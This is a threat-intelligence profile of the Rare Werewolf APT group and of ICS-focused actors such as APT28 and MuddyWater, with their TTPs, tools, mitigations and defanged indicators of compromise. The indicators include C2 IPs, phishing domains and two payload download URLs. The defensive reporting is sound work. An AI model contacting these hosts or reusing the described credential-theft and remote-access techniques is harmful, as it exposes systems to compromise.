## Attribution & Identity
Advanced Persistent Threat (APT) group, also tracked as "librarian\_ghouls\_group," "Rare Werewolf," or "Rezet."
## Activity Summary
Actively targeting entities in Russia and the CIS region (operations observed until May 2025). They compromise systems using phishing emails containing password-protected archives to establish remote access, steal credentials, and deploy XMRig crypto miners. They deploy self-extracting installers that download various malicious utilities.
## Tactics, Techniques & Procedures
- Spear-phishing via emails containing password-protected archives.
- Deployment of self-extracting installers.
- Use of legitimate third-party software for cover.
- Establishing remote access (e.g., using Anydesk).
- Credential theft.
- Deployment of XMRig crypto miner.
- Data exfiltration.
- **Mentioned Tools:** Anydesk, DefenderControl, XMRig miner, Sticky_Werewolf, MIPKO, Passview, Ngrok, NirCmd.
- **Mentioned Techniques:** Spear-phishing technique, MITRE ATT&CK IDs not supplied.
## Targeting
- **Sectors:** Industrial and educational institutions.
- **Geography:** Russia and the CIS region.
- **Victims:** Specific organizations not named.
## Tools & Infrastructure
- **Malware families used:** XMRig crypto miner, various malicious utilities deployed via installer.
- **Infrastructure (C2, domains, IPs):**
- IP: `185[.]125[.]51[.]5`
- Domains: `downdown[.]ru`, `users-mail[.]ru`, `deauthorization[.]online`, `dragonfires[.]ru`, `vniir[.]space`, `vniir[.]nl`, `hostingforme[.]nl`, `mail-cheker[.]nl`, `unifikator[.]ru`, `outinfo[.]ru`, `anyhostings[.]ru`, `center-mail[.]ru`, `redaction-voenmeh[.]info`, `acountservices[.]nl`, `accouts-verification[.]ru`, `office-email[.]ru`, `email-office[.]ru`, `email-informer[.]ru`, `office-account[.]ru`, `anyinfos[.]ru`, `verifikations[.]ru`, `claud-mail[.]ru`, `detectis[.]ru`, `supersuit[.]site`, `bmapps[.]org`
- URLs: `http://bmapps[.]org/bmcontrol/win64/Install[.]exe`, `https://bmapps[.]org/bmcontrol/win64/app-1[.]4[.]zip`
## Implications
A resilient APT group focused on long-term compromise, combining espionage (credential theft, data exfiltration) with financially motivated activity (cryptojacking).
## Mitigations
Implement strong email filtering for password-protected archives, network monitoring for unusual outbound connections typical of remote access/C2 tools (like Anydesk, Ngrok), and endpoint detection for unauthorized crypto mining activity.
***
# Threat Actors Mentioned in Context of TTPs (Industrial/ICS Focus)
## Attribution & Identity
Groups mentioned historically or in the context of industrial/supply chain threats include: APT28 (Fancy Bear), MuddyWater, and actors linked to Havex RAT.
## Activity Summary
These actors are noted for employing social engineering techniques to breach supply chains and OT environments. APT28 and MuddyWater have used "ClickFix baiting" to execute malicious commands. The summary also references a security incident involving a rogue Raspberry Pi, highlighting insider or vendor threat risks in ICS networks.
## Tactics, Techniques & Procedures
- Supply chain risk exploitation (via physical devices like Raspberry Pi).
- Watering hole techniques.
- ClickFix baiting (social engineering to execute commands).
- MITM attacks.
- LOLBIN usage.
- RATs (Havex, Xworm).
- Lumma Stealer, AsyncRAT.
## Targeting
- **Sectors:** Industrial Control Systems (ICS) environments.
- **Geography & Victims:** Not specified in detail.
## Tools & Infrastructure
- **Malware families used:** Havex RAT, Xworm RAT, Lumma Stealer, AsyncRAT.
- **Infrastructure (C2, domains, IPs):** IPs listed are general IoCs potentially shared by various tracked threats: `212[.]237[.]217[.]182`, `193[.]36[.]38[.]237`, `188[.]34[.]195[.]44`, `138[.]199[.]156[.]22`, `185[.]250[.]151[.]155`, `64[.]94[.]84[.]217`, `94[.]181[.]229[.]250`, `216[.]245[.]184[.]181`, `168[.]119[.]96[.]41`, `205[.]196[.]186[.]70`.
- **Domains:** `rkuagqnmnypetvf[.]top`, `tlgrm-redirect[.]icu`, `diagnostics[.]medgenome[.]com`.
## Implications
A heightened risk to Operational Technology (OT) environments due to sophisticated supply chain infiltration and social engineering tailored for ICS networks.
## Mitigations
Implement stringent vendor/supply chain security policies, use network segmentation to isolate OT environments, and conduct advanced monitoring for anomalous device behavior uncommon in ICS networks.